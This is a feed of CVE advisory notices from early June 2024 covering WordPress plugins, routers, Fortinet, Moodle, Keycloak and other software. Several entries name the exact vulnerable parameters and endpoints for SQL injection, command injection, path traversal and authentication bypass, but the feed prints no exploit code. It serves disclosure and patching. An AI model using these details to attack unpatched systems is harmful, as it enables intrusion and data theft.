🚨 CVE-2024-2019The WP-DB-Table-Editor plugin for WordPress is vulnerable to unauthorized access of data, modification of data, and loss of data due to lack of a default capability requirement on the 'dbte_render' function in all versions up to, and including, 1.8.4. This makes it possible for authenticated attackers, with contributor access and above, to modify database tables that the theme has been configured to use the plugin to edit.🎖@cveNotify |
|
| 2024-06-04 06:37:25 |
🚨 CVE-2024-1717The Admin Notices Manager plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the handle_ajax_call() function in all versions up to, and including, 1.4.0. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve a list of registered user emails.🎖@cveNotify |
|
| 2024-06-04 06:37:24 |
🚨 CVE-2024-0757The Insert or Embed Articulate Content into WordPress plugin through 4.3000000023 is not properly filtering which file extensions are allowed to be imported on the server, allowing the uploading of malicious code within zip files🎖@cveNotify |
|
| 2024-06-04 05:37:24 |
🚨 CVE-2024-3888The tagDiv Composer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's button shortcode in all versions up to, and including, 4.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. NOTE: The vulnerable code in this plugin is specifically tied to the tagDiv Newspaper theme. If another theme is installed (e.g., NewsMag), this code may not be present.🎖@cveNotify |
|
| 2024-06-04 01:07:31 |
🚨 CVE-2017-3506Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle WebLogic Server accessible data as well as unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.0 Base Score 7.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N).🎖@cveNotify |
|
| 2024-06-03 23:37:25 |
🚨 CVE-2024-4540A flaw was found in Keycloak in OAuth 2.0 Pushed Authorization Requests (PAR). Client-provided parameters were found to be included in plain text in the KC_RESTART cookie returned by the authorization server's HTTP response to a `request_uri` authorization request, possibly leading to an information disclosure vulnerability.🎖@cveNotify |
|
| 2024-06-03 23:37:24 |
🚨 CVE-2024-1233A flaw was found in` JwtValidator.resolvePublicKey` in JBoss EAP, where the validator checks jku and sends a HTTP request. During this process, no whitelisting or other filtering behavior is performed on the destination URL address, which may result in a server-side request forgery (SSRF) vulnerability.🎖@cveNotify |
|
| 2024-06-03 22:37:32 |
🚨 CVE-2023-26523Missing Authorization vulnerability in CodePeople Calculated Fields Form allows Functionality Misuse.This issue affects Calculated Fields Form: from n/a through 1.1.120.🎖@cveNotify |
|
| 2024-06-03 22:37:25 |
🚨 CVE-2023-23735Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Brainstorm Force Spectra allows Code Injection.This issue affects Spectra: from n/a through 2.3.0.🎖@cveNotify |
|
| 2024-06-03 22:37:24 |
🚨 CVE-2023-23730Improper Restriction of Excessive Authentication Attempts vulnerability in Brainstorm Force Spectra allows Functionality Bypass.This issue affects Spectra: from n/a through 2.3.0.🎖@cveNotify |
|
| 2024-06-03 21:37:24 |
🚨 CVE-2024-36782TOTOLINK CP300 V2.0.4-B20201102 was discovered to contain a hardcoded password vulnerability in /etc/shadow.sample, which allows attackers to log in as root.🎖@cveNotify |
|
| 2024-06-03 20:37:29 |
🚨 CVE-2024-36783TOTOLINK LR350 V9.3.5u.6369_B20220309 was discovered to contain a command injection via the host_time parameter in the NTPSyncWithHost function.🎖@cveNotify |
|
| 2024-06-03 20:37:26 |
🚨 CVE-2024-34987A SQL Injection vulnerability exists in the `ofrs/admin/index.php` script of PHPGurukul Online Fire Reporting System 1.2. The vulnerability allows attackers to bypass authentication and gain unauthorized access by injecting SQL commands into the username input field during the login process.🎖@cveNotify |
|
| 2024-06-03 20:37:25 |
🚨 CVE-2023-52162Mercusys MW325R EU V3 (Firmware MW325R(EU)_V3_1.11.0 Build 221019) is vulnerable to a stack-based buffer overflow, which could allow an attacker to execute arbitrary code. Exploiting the vulnerability requires authentication.🎖@cveNotify |
|
| 2024-06-03 20:37:24 |
🚨 CVE-2023-51219A deep link validation issue in KakaoTalk 10.4.3 allowed a remote adversary to direct users to run any attacker-controller JavaScript within a WebView. The impact was further escalated by triggering another WebView that leaked its access token in a HTTP request header. Ultimately, this access token could be used to takeover another user's account and read her/his chat messages.🎖@cveNotify |
|
| 2024-06-03 18:37:25 |
🚨 CVE-2024-4332An authentication bypass vulnerability has been identified in the REST and SOAP API components of Tripwire Enterprise (TE) 9.1.0 when TE is configured to use LDAP/Active Directory SAML authentication and its optional "Auto-synchronize LDAP Users, Roles, and Groups" feature is enabled. This vulnerability allows unauthenticated attackers to bypass authentication if a valid username is known. Exploitation of this vulnerability could allow remote attackers to gain privileged access to the APIs and lead to unauthorized information disclosure or modification.🎖@cveNotify |
|
| 2024-06-03 18:37:24 |
🚨 CVE-2024-37019Northern.tech Mender Enterprise before 3.6.4 and 3.7.x before 3.7.4 has Weak Authentication.🎖@cveNotify |
|
| 2024-06-03 17:37:24 |
🚨 CVE-2023-47667Cross-Site Request Forgery (CSRF) vulnerability in Mammothology WP Full Stripe Free.This issue affects WP Full Stripe Free: from n/a through 7.0.16.🎖@cveNotify |
|
| 2024-06-03 16:37:25 |
🚨 CVE-2024-36674LyLme_spage v1.9.5 is vulnerable to Cross Site Scripting (XSS) via admin/link.php.🎖@cveNotify |
|
| 2024-06-03 16:37:24 |
🚨 CVE-2024-32983Misskey is an open source, decentralized microblogging platform. Misskey doesn't perform proper normalization on the JSON structures of incoming signed ActivityPub activity objects before processing them, allowing threat actors to spoof the contents of signed activities and impersonate the authors of the original activities. This vulnerability is fixed in 2024.5.0.🎖@cveNotify |
|
| 2024-06-03 15:37:26 |
🚨 CVE-2024-36128Directus is a real-time API and App dashboard for managing SQL database content. Prior to 10.11.2, providing a non-numeric length value to the random string generation utility will create a memory issue breaking the capability to generate random strings platform wide. This creates a denial of service situation where logged in sessions can no longer be refreshed as sessions depend on the capability to generate a random session ID. This vulnerability is fixed in 10.11.2.🎖@cveNotify |
|
| 2024-06-03 15:37:25 |
🚨 CVE-2024-36124iq80 Snappy is a compression/decompression library. When uncompressing certain data, Snappy tries to read outside the bounds of the given byte arrays. Because Snappy uses the JDK class `sun.misc.Unsafe` to speed up memory access, no additional bounds checks are performed and this has similar security consequences as out-of-bounds access in C or C++, namely it can lead to non-deterministic behavior or crash the JVM. iq80 Snappy is not actively maintained anymore. As quick fix users can upgrade to version 0.5.🎖@cveNotify |
|
| 2024-06-03 15:37:24 |
🚨 CVE-2024-36123Citizen is a MediaWiki skin that makes extensions part of the cohesive experience. The page `MediaWiki:Tagline` has its contents used unescaped, so custom HTML (including Javascript) can be injected by someone with the ability to edit the MediaWiki namespace (typically those with the `editinterface` permission, or sysops). This vulnerability is fixed in 2.16.0.🎖@cveNotify |
|
| 2024-06-03 15:07:44 |
🚨 CVE-2024-34009Insufficient checks whether ReCAPTCHA was enabled made it possible to bypass the checks on the login page. This did not affect other pages where ReCAPTCHA is utilized.🎖@cveNotify |
|
| 2024-06-03 15:07:43 |
🚨 CVE-2024-34007The logout option within MFA did not include the necessary token to avoid the risk of users inadvertently being logged out via CSRF.🎖@cveNotify |
|
| 2024-06-03 15:07:42 |
🚨 CVE-2024-34006The site log report required additional encoding of event descriptions to ensure any HTML in the content is displayed in plaintext instead of being rendered.🎖@cveNotify |
|
| 2024-06-03 15:07:38 |
🚨 CVE-2024-34004In a shared hosting environment that has been misconfigured to allow access to other users' content, a Moodle user with both access to restore wiki modules and direct access to the web server outside of the Moodle webroot could execute a local file include.🎖@cveNotify |
|
| 2024-06-03 15:07:37 |
🚨 CVE-2024-34002In a shared hosting environment that has been misconfigured to allow access to other users' content, a Moodle user with both access to restore feedback modules and direct access to the web server outside of the Moodle webroot could execute a local file include.🎖@cveNotify |
|
| 2024-06-03 15:07:36 |
🚨 CVE-2024-36845An invalid pointer in the modbus_receive() function of libmodbus v3.1.6 allows attackers to cause a Denial of Service (DoS) via a crafted message sent to the unit-test-server.🎖@cveNotify |
|
| 2024-06-03 15:07:32 |
🚨 CVE-2024-36843libmodbus v3.1.6 was discovered to contain a heap overflow via the modbus_mapping_free() function.🎖@cveNotify |
|
| 2024-06-03 15:07:31 |
🚨 CVE-2024-34000ID numbers displayed in the lesson overview report required additional sanitizing to prevent a stored XSS risk.🎖@cveNotify |
|
| 2024-06-03 15:07:30 |
🚨 CVE-2024-33999The referrer URL used by MFA required additional sanitizing, rather than being used directly.🎖@cveNotify |
|
| 2024-06-03 15:07:27 |
🚨 CVE-2024-33998Insufficient escaping of participants' names in the participants page table resulted in a stored XSS risk when interacting with some features.🎖@cveNotify |
|
| 2024-06-03 15:07:26 |
🚨 CVE-2024-33996Incorrect validation of allowed event types in a calendar web service made it possible for some users to create events with types/audiences they did not have permission to publish to.🎖@cveNotify |
|
| 2024-06-03 15:07:25 |
🚨 CVE-2024-23316HTTP request desynchronization in Ping Identity PingAccess, all versions prior to 8.0.1 affected allows an attacker to send specially crafted http header requests to create a request smuggling condition for proxied requests.🎖@cveNotify |
|
| 2024-06-03 13:37:24 |
🚨 CVE-2023-49086Cacti is a robust performance and fault management framework and a frontend to RRDTool - a Time Series Database (TSDB). A vulnerability in versions prior to 1.2.27 bypasses an earlier fix for CVE-2023-39360, therefore leading to a DOM XSS attack. Exploitation of the vulnerability is possible for an authorized user. The vulnerable component is the `graphs_new.php`. The impact of the vulnerability is execution of arbitrary JavaScript code in the attacked user's browser. This issue has been patched in version 1.2.27.🎖@cveNotify |
|
| 2024-06-03 12:37:31 |
🚨 CVE-2024-34770Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Popup Maker Popup Maker WP allows Stored XSS.This issue affects Popup Maker WP: from n/a through 1.2.8.🎖@cveNotify |
|
| 2024-06-03 12:37:26 |
🚨 CVE-2024-34767Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in HasThemes ShopLentor allows Stored XSS.This issue affects ShopLentor: from n/a through 2.8.7.🎖@cveNotify |
|
| 2024-06-03 12:37:25 |
🚨 CVE-2024-34764Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in WPDeveloper Essential Addons for Elementor allows Stored XSS.This issue affects Essential Addons for Elementor: from n/a through 5.9.15.🎖@cveNotify |
|
| 2024-06-03 12:37:24 |
🚨 CVE-2024-34385Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in YITH YITH WooCommerce Wishlist allows Stored XSS.This issue affects YITH WooCommerce Wishlist: from n/a through 3.32.0.🎖@cveNotify |
|
| 2024-06-03 11:37:39 |
🚨 CVE-2024-35630Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in LJ Apps WP TripAdvisor Review Slider allows Blind SQL Injection.This issue affects WP TripAdvisor Review Slider: from n/a through 12.6.🎖@cveNotify |
|
| 2024-06-03 11:37:38 |
🚨 CVE-2024-34803Missing Authorization vulnerability in Fastly.This issue affects Fastly: from n/a through 1.2.25.🎖@cveNotify |
|
| 2024-06-03 11:37:37 |
🚨 CVE-2024-34801Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Mervin Praison Praison SEO WordPress allows Stored XSS.This issue affects Praison SEO WordPress: from n/a through 4.0.15.🎖@cveNotify |
|
| 2024-06-03 11:37:33 |
🚨 CVE-2024-34797Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Benoit Mercusot Simple Popup Manager allows Stored XSS.This issue affects Simple Popup Manager: from n/a through 1.3.5.🎖@cveNotify |
|
| 2024-06-03 11:37:32 |
🚨 CVE-2024-34795Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Tainacan.Org Tainacan allows Stored XSS.This issue affects Tainacan: from n/a through 0.21.3.🎖@cveNotify |
|
| 2024-06-03 11:37:31 |
🚨 CVE-2024-34794Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Tainacan.Org Tainacan allows Reflected XSS.This issue affects Tainacan: from n/a through 0.21.3.🎖@cveNotify |
|
| 2024-06-03 11:37:27 |
🚨 CVE-2024-34793Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Kharim Tomlinson WP Next Post Navi allows Stored XSS.This issue affects WP Next Post Navi: from n/a through 1.8.3.🎖@cveNotify |
|
| 2024-06-03 11:37:26 |
🚨 CVE-2024-34790Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Hans van Eijsden,niwreg ImageMagick Sharpen Resized Images allows Stored XSS.This issue affects ImageMagick Sharpen Resized Images: from n/a through 1.1.7.🎖@cveNotify |
|
| 2024-06-03 11:37:25 |
🚨 CVE-2024-34789Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in WP Hait Post Grid Elementor Addon allows Stored XSS.This issue affects Post Grid Elementor Addon: from n/a through 2.0.16.🎖@cveNotify |
|
| 2024-06-03 11:37:24 |
🚨 CVE-2024-34754Exposure of Sensitive Information to an Unauthorized Actor vulnerability in A WP Life Contact Form Widget.This issue affects Contact Form Widget: from n/a through 1.3.9.🎖@cveNotify |
|
| 2024-06-03 10:37:44 |
🚨 CVE-2024-3829qdrant/qdrant version 1.9.0-dev is vulnerable to arbitrary file read and write during the snapshot recovery process. Attackers can exploit this vulnerability by manipulating snapshot files to include symlinks, leading to arbitrary file read by adding a symlink that points to a desired file on the filesystem and arbitrary file write by including a symlink and a payload file in the snapshot's directory structure. This vulnerability allows for the reading and writing of arbitrary files on the server, which could potentially lead to a full takeover of the system. The issue is fixed in version v1.9.0.🎖@cveNotify |
|
| 2024-06-03 10:37:43 |
🚨 CVE-2024-35633Server-Side Request Forgery (SSRF) vulnerability in CreativeThemes Blocksy Companion.This issue affects Blocksy Companion: from n/a through 2.0.42.🎖@cveNotify |
|
| 2024-06-03 10:37:42 |
🚨 CVE-2024-23668An improper authorization in Fortinet FortiWebManager version 7.2.0 and 7.0.0 through 7.0.4 and 6.3.0 and 6.2.3 through 6.2.4 and 6.0.2 allows attacker to execute unauthorized code or commands via HTTP requests or CLI.🎖@cveNotify |
|
| 2024-06-03 10:37:38 |
🚨 CVE-2024-23665Multiple improper authorization vulnerabilities [CWE-285] in FortiWeb version 7.4.2 and below, version 7.2.7 and below, version 7.0.10 and below, version 6.4.3 and below, version 6.3.23 and below may allow an authenticated attacker to perform unauthorized ADOM operations via crafted requests.🎖@cveNotify |
|
| 2024-06-03 10:37:37 |
🚨 CVE-2024-23363Transient DOS while processing an improperly formatted Fine Time Measurement (FTM) management frame.🎖@cveNotify |
|
| 2024-06-03 10:37:36 |
🚨 CVE-2024-23360Memory corruption while creating a LPAC client as LPAC engine was allowed to access GPU registers.🎖@cveNotify |
|
| 2024-06-03 10:37:32 |
🚨 CVE-2023-43556Memory corruption in Hypervisor when platform information mentioned is not aligned.🎖@cveNotify |
|
| 2024-06-03 10:37:31 |
🚨 CVE-2023-43551Cryptographic issue while performing attach with a LTE network, a rogue base station can skip the authentication phase and immediately send the Security Mode Command.🎖@cveNotify |
|
| 2024-06-03 10:37:30 |
🚨 CVE-2023-43545Memory corruption when more scan frequency list or channels are sent from the user space.🎖@cveNotify |
|
| 2024-06-03 10:37:27 |
🚨 CVE-2023-43544Memory corruption when IPC callback handle is used after it has been released during register callback by another thread.🎖@cveNotify |
|
| 2024-06-03 10:37:26 |
🚨 CVE-2023-43542Memory corruption while copying a keyblob`s material when the key material`s size is not accurately checked.🎖@cveNotify |
|
| 2024-06-03 10:37:25 |
🚨 CVE-2023-43538Memory corruption in TZ Secure OS while Tunnel Invoke Manager initialization.🎖@cveNotify |
|
| 2024-06-03 10:37:24 |
🚨 CVE-2023-43537Information disclosure while handling T2LM Action Frame in WLAN Host.🎖@cveNotify |
|
| 2024-06-03 09:37:26 |
🚨 CVE-2024-5404An unauthenticated remote attacker can change the admin password in a moneo appliance due to weak password recovery mechanism.🎖@cveNotify |
|
| 2024-06-03 09:37:25 |
🚨 CVE-2024-35638Cross-Site Request Forgery (CSRF) vulnerability in JumpDEMAND Inc. ActiveDEMAND.This issue affects ActiveDEMAND: from n/a through 0.2.43.🎖@cveNotify |
|
| 2024-06-03 09:37:24 |
🚨 CVE-2024-35637Server-Side Request Forgery (SSRF) vulnerability in Church Admin.This issue affects Church Admin: from n/a through 4.3.6.🎖@cveNotify |
|
| 2024-06-03 08:37:27 |
🚨 CVE-2024-36960In the Linux kernel, the following vulnerability has been resolved:drm/vmwgfx: Fix invalid reads in fence signaled eventsCorrectly set the length of the drm_event to the size of the structurethat's actually used.The length of the drm_event was set to the parent structure instead ofto the drm_vmw_event_fence which is supposed to be read. drm_readuses the length parameter to copy the event to the user space thusresuling in oob reads.🎖@cveNotify |
|
| 2024-06-03 08:37:26 |
🚨 CVE-2024-31493An improper removal of sensitive information before storage or transfer vulnerability [CWE-212] in FortiSOAR version 7.3.0, version 7.2.2 and below, version 7.0.3 and below may allow an authenticated low privileged user to read Connector passwords in plain-text via HTTP responses.🎖@cveNotify |
|
| 2024-06-03 08:37:25 |
🚨 CVE-2024-23107An exposure of sensitive information to an unauthorized actor vulnerability [CWE-200] in FortiWeb version 7.4.0, version 7.2.4 and below, version 7.0.8 and below, 6.3 all versions may allow an authenticated attacker to read password hashes of other administrators via CLI commands.🎖@cveNotify |
|
| 2024-06-03 08:37:24 |
🚨 CVE-2023-48789A client-side enforcement of server-side security in Fortinet FortiPortal version 6.0.0 through 6.0.14 allows attacker to improper access control via crafted HTTP requests.🎖@cveNotify |
|
| 2024-06-03 07:37:26 |
🚨 CVE-2024-5311DigiWin EasyFlow .NET lacks validation for certain input parameters. An unauthenticated remote attacker can inject arbitrary SQL commands to read, modify, and delete database records.🎖@cveNotify |
|
| 2024-06-03 07:37:25 |
🚨 CVE-2024-35642Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Bryan Hadaway Site Favicon allows Stored XSS.This issue affects Site Favicon: from n/a through 0.2.🎖@cveNotify |
|
| 2024-06-03 07:37:24 |
🚨 CVE-2024-35641Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in GregRoss Just Writing Statistics allows Stored XSS.This issue affects Just Writing Statistics: from n/a through 4.5.🎖@cveNotify |
|
| 2024-06-03 06:37:25 |
🚨 CVE-2024-37031The Active Admin (aka activeadmin) framework before 3.2.2 for Ruby on Rails allows stored XSS in certain situations where users can create entities (to be later edited in forms) with arbitrary names, aka a "dynamic form legends" issue. 4.0.0.beta7 is also a fixed version.🎖@cveNotify |
|
| 2024-06-03 06:37:24 |
🚨 CVE-2024-36042Silverpeas before 6.3.5 allows authentication bypass by omitting the Password field to AuthenticationServlet, often providing an unauthenticated user with superadmin access.🎖@cveNotify |
|
| 2024-06-03 04:37:31 |
🚨 CVE-2023-42427Cross-site scripting vulnerability exists in UNIVERSAL PASSPORT RX versions 1.0.0 to 1.0.7, which may allow a remote authenticated attacker to execute an arbitrary script on the web browser of the user who is using the product.🎖@cveNotify |
|
| 2024-06-03 01:37:25 |
🚨 CVE-2024-5590A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3. It has been declared as critical. This vulnerability affects unknown code of the file /protocol/iscuser/uploadiscuser.php of the component JSON Content Handler. The manipulation of the argument messagecontent leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-266848. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-06-03 01:37:24 |
🚨 CVE-2024-5589A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3. It has been classified as critical. This affects an unknown part of the file /admin/config_MT.php?action=delete. The manipulation of the argument Mid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-266847. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-06-02 15:37:24 |
🚨 CVE-2024-5588A vulnerability was found in itsourcecode Learning Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file processscore.php. The manipulation of the argument LessonID leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-266839.🎖@cveNotify |
|
| 2024-06-02 14:37:26 |
🚨 CVE-2024-36391MileSight DeviceHub - CWE-320: Key Management Errors may allow Authentication Bypass and Man-In-The-Middle Traffic🎖@cveNotify |
|
| 2024-06-02 14:37:25 |
🚨 CVE-2024-36389MileSight DeviceHub - CWE-330 Use of Insufficiently Random Values may allow Authentication Bypass🎖@cveNotify |
|
| 2024-06-02 14:37:24 |
🚨 CVE-2024-36388MileSight DeviceHub - CWE-305 Missing Authentication for Critical Function🎖@cveNotify |
|
| 2024-06-02 13:37:24 |
🚨 CVE-2024-27776MileSight DeviceHub - CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') may allow Unauthenticated RCE🎖@cveNotify |
|
| 2024-06-02 11:37:24 |
🚨 CVE-2024-2178A path traversal vulnerability exists in the parisneo/lollms-webui, specifically within the 'copy_to_custom_personas' endpoint in the 'lollms_personalities_infos.py' file. This vulnerability allows attackers to read arbitrary files by manipulating the 'category' and 'name' parameters during the 'Copy to custom personas folder for editing' process. By inserting '../' sequences in these parameters, attackers can traverse the directory structure and access files outside of the intended directory. Successful exploitation results in unauthorized access to sensitive information.🎖@cveNotify |
|
| 2024-06-02 10:37:24 |
🚨 CVE-2024-5587A vulnerability was found in Casdoor up to 1.335.0. It has been classified as problematic. Affected is an unknown function of the file /conf/app.conf of the component Configuration File Handler. The manipulation leads to files or directories accessible. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-266838 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-06-02 05:37:24 |
🚨 CVE-2024-4344The Shield Security – Smart Bot Blocking & Intrusion Prevention Security plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 19.1.13. This is due to missing or incorrect nonce validation on the exec function. This makes it possible for unauthenticated attackers to disable pin protection for the admin interface of the plugin via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-06-02 00:37:25 |
🚨 CVE-2024-35646Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Smartarget Smartarget Message Bar allows Stored XSS.This issue affects Smartarget Message Bar: from n/a through 1.3.🎖@cveNotify |
|
| 2024-06-02 00:37:24 |
🚨 CVE-2024-35645Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in vinoth06 Random Banner allows Stored XSS.This issue affects Random Banner: from n/a through 4.2.8.🎖@cveNotify |
|
| 2024-06-01 16:37:24 |
🚨 CVE-2024-4148A Regular Expression Denial of Service (ReDoS) vulnerability exists in the lunary-ai/lunary application, version 1.2.10. An attacker can exploit this vulnerability by maliciously manipulating regular expressions, which can significantly impact the response time of the application and potentially render it completely non-functional. Specifically, the vulnerability can be triggered by sending a specially crafted request to the application, leading to a denial of service where the application crashes.🎖@cveNotify |
|
| 2024-06-01 09:37:26 |
🚨 CVE-2024-5348The Elements For Elementor plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.1 via the 'beforeafter_layout' attribute of the beforeafter widget, the 'eventsgrid_layout' attribute of the eventsgrid and list widgets, the 'marquee_layout' attribute of the marquee widget, the 'postgrid_layout' attribute of the postgrid widget, the 'woocart_layout' attribute of the woocart widget, and the 'woogrid_layout' attribute of the woogrid widget. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.🎖@cveNotify |
|
| 2024-06-01 09:37:25 |
🚨 CVE-2024-3200The wpForo Forum plugin for WordPress is vulnerable to SQL Injection via the 'slug' attribute of the 'wpforo' shortcode in all versions up to, and including, 2.3.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-06-01 09:37:24 |
🚨 CVE-2024-35636Cross-Site Request Forgery (CSRF) vulnerability in Uploadcare Uploadcare File Uploader and Adaptive Delivery (beta) uploadcare.This issue affects Uploadcare File Uploader and Adaptive Delivery (beta): from n/a through 3.0.11.🎖@cveNotify |
|
| 2024-06-01 08:37:25 |
🚨 CVE-2024-4958The User Registration – Custom Registration Form, Login Form, and User Profile WordPress Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'import_form_action' function in versions up to, and including, 3.2.0.1. This makes it possible for authenticated attackers, with contributor-level permissions and above, to import a registration form with a default user role of administrator. If an administrator approves or publishes a post or page with the shortcode to the imported form, any user can register as an administrator.🎖@cveNotify |
|
| 2024-06-01 08:37:24 |
🚨 CVE-2024-2295The Contact Form Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's [xyz-cfm-form] shortcode in all versions up to, and including, 1.6.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-01 07:37:25 |
🚨 CVE-2024-2506The Popup Builder – Create highly converting, mobile friendly marketing popups. plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the custom JS functionality in all versions up to, and including, 4.2.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-01 07:37:24 |
🚨 CVE-2024-1324The QQWorld Auto Save Images plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the save_remote_images_get_auto_saved_results() function hooked via a norpriv AJAX in all versions up to, and including, 1.9.8. This makes it possible for unauthenticated attackers to retrieve the contents of arbitrary posts that may not be public.🎖@cveNotify |
|
| 2024-06-01 06:37:25 |
🚨 CVE-2024-4342The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's image hotspot, image accordion, off canvas, woogrid, and product mini cart widgets in all versions up to, and including, 1.3.975 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-01 06:37:24 |
🚨 CVE-2024-4087The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Back to Top widget in all versions up to, and including, 1.3.975 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-01 05:37:24 |
🚨 CVE-2023-6382The Master Slider – Responsive Touch Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ms_slide' shortcode in all versions up to, and including, 3.9.9 due to insufficient input sanitization and output escaping on user supplied 'css_class' attribute. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-01 04:37:25 |
🚨 CVE-2024-3565The Content Blocks (Custom Post Widget) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'content_block' shortcode in all versions up to, and including, 3.3.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-01 04:37:24 |
🚨 CVE-2024-3564The Content Blocks (Custom Post Widget) plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.3.0 via the plugin's 'content_block' shortcode. This makes it possible for authenticated attackers, with contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.🎖@cveNotify |
|
| 2024-06-01 03:37:24 |
🚨 CVE-2024-4711The WordPress Infinite Scroll – Ajax Load More plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ajax_load_more shortcode in versions up to, and including, 7.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-01 02:37:24 |
🚨 CVE-2024-2933The Page Builder Gutenberg Blocks – CoBlocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Social Profiles widget in all versions up to, and including, 3.1.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-31 21:37:33 |
🚨 CVE-2024-34009Insufficient checks whether ReCAPTCHA was enabled made it possible to bypass the checks on the login page. This did not affect other pages where ReCAPTCHA is utilized.🎖@cveNotify |
|
| 2024-05-31 21:37:32 |
🚨 CVE-2024-34007The logout option within MFA did not include the necessary token to avoid the risk of users inadvertently being logged out via CSRF.🎖@cveNotify |
|
